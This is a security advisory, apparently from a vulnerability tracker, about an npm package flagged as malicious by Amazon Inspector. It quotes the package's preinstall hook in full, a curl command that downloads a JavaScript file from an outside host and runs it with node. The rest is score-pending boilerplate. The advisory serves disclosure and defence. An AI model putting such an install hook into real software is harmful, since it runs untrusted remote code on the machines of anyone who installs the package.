Vulnerability
Malicious code in sn-internal-testjgsakjdkjadkjahsdkjad (npm)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (b71b954927bd19d1ae8c3bef3965b4cbbaae3cc1f29c34ae6f90f36b2cd7f7fe) package.json declares a preinstall lifecycle hook that runs `curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js`. On any `npm install`, the script fetches an unpinned, mutable JavaScript file from poc.amanrawat.com over plain HTTPS and immediately executes it with node under the installer's user account. There is no hash or signature verification, no version pinning, and the destination is not a recognized runtime/CDN or publisher-owned host. The package name (`sn-internal-testjgsakjdkjadkjahsdkjad`), description ("This is our internal app for testing"), and the `poc.` (proof-of-concept) hostname indicate this is a dependency-confusion / supply-chain PoC, but the install-time payload is a real and unconditional remote-code-execution primitive against any installer.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence